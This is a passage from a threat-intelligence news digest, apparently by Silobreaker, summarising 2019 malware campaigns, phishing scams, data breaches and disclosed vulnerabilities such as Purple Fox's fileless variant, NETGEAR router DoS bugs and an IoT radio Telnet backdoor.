  • The purpose of both malware variants is to tunnel traffic between two IP addresses, which is done by using a custom protocol. By using a proxy server or port and a proxy username and password when configuring the malware, threat actors are also capable of bypassing a compromised system’s required authentication to reach outside of the network.

Source (Includes IOCs)

 

Purple Fox malware updated to include fileless capabilities

  • Researchers at Trend Micro observed Purple Fox malware abusing PowerShell, rather than its typical use of Nullsoft Scriptable Install System, making it capable of fileless infection. It also includes additional exploits, most likely to ensure infection. Purple Fox is a downloader, typically delivered by the Rig exploit kit and was first discovered in September 2018.
  • The new variant uses three separate methods to redirect the user to the malicious PowerShell script, namely via a SWF file that exploits CVE-2018-15982, or via two HTM files exploiting the VBScript vulnerabilities CVE-2014-6332 and CVE-2018-8174. If the targeted user does not have administrative access, the Win32k vulnerabilities CVE-2015-1701 and CVE-2018-8120 are also exploited using PowerSploit to gain privileges to install Purple Fox’s main components.
  • Unlike previous versions, this variant abuses an open-source code to enable its rootkit components, as well as a file utility software to hide its DLL component to prevent reverse engineering or cracking attempts.

Source (Includes IOCs)

 

Undocumented backdoor attributed to Stealth Falcon

  • Researchers at ESET identified an unreported binary backdoor, dubbed Win32/StealthFalcon, being used to compromise devices in the United Arab Emirates, Saudi Arabia, Thailand and the Netherlands. The researchers attributed the malware to the Stealth Falcon group who have been active since 2012 and primarily target journalists, activists and dissidents in the Middle East.
  • The backdoor appears to have been created in 2015. It is a DLL file which supports basic commands while also being able to collect data, exfiltrate data, employ further malicious tools, and update its configuration. The backdoor communication with its C2 through the standard Windows component Background Intelligent Transfer Service.
  • The researchers attributed the backdoor to the Stealth Falcon group by comparing it to a Powershell backdoor that was discovered by researchers at Citizen Lab. The researchers found that both backdoors communicated with the same C2, share code similarities and use the same hardcoded identifiers.

Source (Includes IOCs)

 

Ongoing Campaigns

Challenger and Harvey Norman warn of phishing scams impersonating the companies

  • The Challenger Technologies scam involves threat actors sending an SMS to customers, falsely claiming they won a mobile phone contest. The link in the text message redirects the user to a phishing site that asks for the user’s credit card details to pay for a processing fee. The company stated it only communicates with customers via its Facebook page, app or shopping site, and not via SMS.
  • Harvey Norman warned its customers of a fake Facebook page impersonating the company, called ‘Harvey Norman-Singapore’, whereas the legitimate company page is ‘Harvey Norman Singapore’. Customers are informed that the company will never ask for personal information or credit card details via unsolicited messages.

Source

 

Malvertising campaigns used to deliver malware via exploit kits

  • Security researcher nao­_sec identified four malvertising campaigns that redirected users to the landing pages of various exploit kits. When a user visited the malicious site, the kits attempted to exploit vulnerabilities and install malware on the victim’s system.
  • The first campaign was identified on September 7th, 2019,  and used the GrandSoft exploit kit to push the banking trojan Ramnit . The second campaign was identified the following day and utilized the Rig exploit kit to deliver clipboard hijackers and Amadey malware.
  • The final two campaigns were discovered on September 9th, 2019. The first used the Fallout exploit kit to distribute a clipboard hijacker. The second campaign pushed the Radio exploit kit which was used to install Nemty Ransomware.

Source

 

Spam campaign uses LokiBot trojan to target US manufacturing company

  • On August 21st, 2019, researchers at Fortinet identified a malicious spam campaign that was delivering LokiBot trojan. The attack began with an email that was written in broken English and contained an attachment that purported to be a ‘request for quotation’.
  • Users who unzipped the file would infect their system with LokiBot malware. LokiBot steals FTP credentials, email and browser passwords, and other credentials.
  • The IP address which the email was sent from has been used in two other malicious spam attacks, one of which targeted a German bakery. The researchers suggested that the difference in each campaign’s language and attack template indicates that the IP address is a spam relay.

Source (Include IOCs) 

 

Phishing campaign uses CAPTCHA to bypass secure email gateways

  • Researchers at Proofpoint identified a phishing campaign that redirected users to CAPTCHA in order to prevent URL analysis from detecting malicious links. The attack starts from a compromised email account that appears to have originated from a voip2mail service. The email purports to contain a voice message which in actuality is an embedded hyperlink.
  • Targets who click on the link are redirected to a page containing a CAPTCHA code. Secure email gateways (SEG) cannot proceed past the CAPTCHA page to scan the malicious site. The SEG therefore marks the CAPTCHA page as safe and allows the user to proceed.
  • The target then completes CAPTCHA authentication and is redirected to a phishing page that asks them to select their Microsoft account and sign in. Both the CAPTCHA page and main phishing page are hosted on MSFT infrastructure and are marked as safe against domain reputation databases.

Source (Includes IOCs)

 

Hacker Groups

Thrip group target South East Asian military organisations, satellite operators, and more

  • Researchers at Symantec discovered that the Chinese-based espionage group Thrip have conducted multiple operations in South East Asia since June 2018. The group’s operations targeted twelve organisations in Hong Kong, Macau, Indonesia, Malaysia, the Philippines, and Vietnam. Targets include the military in two counties, satellite communication operators, media organisations and the education sector.
  • The group are using two custom backdoors named Hannotog and Sagerunex to achieve persistence and remote access on target networks. Thrip also steals information on certain computers with their custom Catchamas malware.
  • The researchers stated that Sagerunex is an evolved variant of Evora which is used by fellow Chinese espionage group Lotus Blossom. The researchers suggested that Thrip and Lotus Blossom may have amalgamated into the same group.  

Source (Includes IOCs)

 

Leaks and Breaches

Private data of 50,000 Australian students potentially exposed in Get app data breach

  • A user of the Get app discovered they could request information on other users by using the company’s search function API. The company was formerly known as Qnect Technologies and is used by university societies and clubs for payments. According to the company, changes have been made to prevent such data being visible and affected organisations will be informed.
  • Potentially exposed data includes names, email addresses, dates of birth, Facebook IDs, and phone numbers. The company stated that no personal payment information is stored in its databases.
  • The company had previously suffered a data breach, in which hackers threatened to publish acquired user data unless the company paid the hackers. The data breach took place in 2018, after which Qnect rebranded to Get.

Source

 

Illinois school district hit by ransomware attack

  • Rockford Public Schools District 205 continues to experience outages following a ransomware attack on its systems on September 6th, 2019. The attack affected the district’s internet and information systems, as well as some phone lines. The outages are expected to continue for several days.

Source

 

Likud Party database exposes personal data of about 4 million voters

  • Israeli newspaper Haaretz found a database belonging to the Likud Party by following a link given to representatives at polling stations for instructions on online applications. Likud, whose chairperson is Prime Minister Netanyahu, blocked access to the database within twenty minutes of being informed of the data leak.
  • Exposed data included full names, addresses, mobile phone numbers, ID numbers, and the individual’s political stance on Likud. It remains unclear how Likud obtained the data and how long the data was available to the public.

Source

 

‘Data incident’ exposes personal data of Boy Scouts of America members

  • Boy Scouts of America’s third-party vendor Trail’s End informed the organisation and local councils of a ‘data incident’ that exposed private information of children and their parents. According to Trail’s End, the incident should not be characterised as a data leak, whereas Boy Scouts of America has acknowledged the data breach.
  • Exposed data includes full names, dates of birth, email addresses, phone numbers, parent names, favorite products and affiliation, such as council, district or unit. Social Security numbers and bank information were not exposed.
  • It remains unclear how many individuals were affected, whether the data breach was local or national, and how long the data was exposed.

Source

 

US Secret Service investigate breach at IT contractor Miracle Systems LLC

  • Researcher Brian Krebs reported that an investigation is ongoing at government IT contractor Miracle System LLC after a criminal advertised access to their platform on an underground forum. The company has contracts with more than twenty federal agencies including the US Department of Transportation, the National Institutes of Health, and US Citizenship and Immigration Services.
  • The investigation was triggered when a member of a Russian-language cybercrime forum offered to sell access to the contractor’s system for approximately $60,000. The criminal claimed to have access to email correspondence and credentials needed to access the databases of federal agencies.
  • Krebs spoke to Miracle Systems CEO Sandesh Sharda who stated that the hackers were selling access to ‘old stuff’ from the company’s internal test environment. Sharda did however acknowledge that the eight internal systems were infected with Emotet trojan between November 2018 and July 2019.

Source

 

Vulnerabilities

NETGEAR N3000 wireless routers affected by DoS vulnerabilities

  • Researchers at Cisco Talos identified two bugs, tracked as CVE-2019-5054 and CVE-2019-5055, in the NETGEAR N300 line of wireless routers.  Both vulnerabilities can be exploited to trigger a DoS condition.
  • CVE-2019-5054 can be triggered by an unauthenticated attacker who sends a specially crafted HTTP request with an empty User-Agent string to a page that requires authentication. This can cause a null pointer dereference and crash the HTTP.
  • CVE-2019-5055 can also be triggered by an unauthenticated user who sends a specially crafted SOAP requests in an invalid sequence. This can result in the hostapd service crashing.

Source

 

Researchers demonstrate ‘patch-gapping’ on critical Chrome one-day vulnerability

  • Researchers at Exodus Intelligence demonstrated ‘patch-gapping’ by developing an exploit for a flaw affecting Chrome’s V8, the open-source component used as Chrome’s JavaScript engine. The vulnerability could allow a malicious actor to execute malicious code inside a user’s browser.
  • Patch-gapping is a practice that involves the development of a one-day exploit kit during the time when a vulnerability is fixed by developers, yet the patch has not been released to users. The researchers warn that threat actors are probably capable of patch-gapping.
  • In the case of the V8 vulnerability, the flaw was fixed in August 2019, with the patch released publicly to users on September 10th, 2019, with Chrome version 77.

Source

 

Red Lion Controls programming software contains multiple vulnerabilities

  • Trend Micro researchers identified four vulnerabilities in Red Lion Controls Crimson programming software, specifically in version 3.0 and prior, and 3.1 prior to the 3112.00 release. Red Lion Controls products are primarily used in the critical manufacturing sector and the company is a subsidiary of Spectris plc. 
  • The vulnerabilities are tracked as CVE-2019-10996, CVE-2019-10978, CVE-2019-10984 and CVE-2019-10990. The most serious bug can be triggered by an attacker who convinces a targeted user to open a specially crafted CD3 file. A successful attacker will gain the ability to remotely execute arbitrary code.
  • A detailed list of vulnerabilities is available via the US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency.

Source 1 Source 2

 

Telegram messaging app fixes bug that allowed users to view deleted images or files

  • The release of Telegram version 5.11 for Android and iOS fixes a bug that allowed recipients to view files or images after they were deleted by the sender. The issue was discovered by security researcher Dhiraj Mishra who found that deleted Telegram files were locally hosted on a user’s device.

Source

 

Over 1 million IoT radios open to attack through Telnet backdoor

  • Researchers at Vulnerability Lab discovered a vulnerability, tracked as CVE-2019-13473, in Telnet service that connects IoT radios. The vulnerability impacts ‘a huge amount’ of Imperial and Dabman radios.
  • The flaw is caused by the implementation of weak passwords with hard coded credentials. Researchers found that it took them approximately ten minutes to gain access to the radio through brute-forcing tactics.
  • The researchers were able to drop malware, send audio streams or add compromised radios to a botnet. Following the compromise, the researchers discovered a second vulnerability, tracked as CVE-2019-13474, in the AirMusic client which allowed unauthenticated command execution.

Source 1 Source 2 (Includes IOCs)

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Request a demo

Get in touch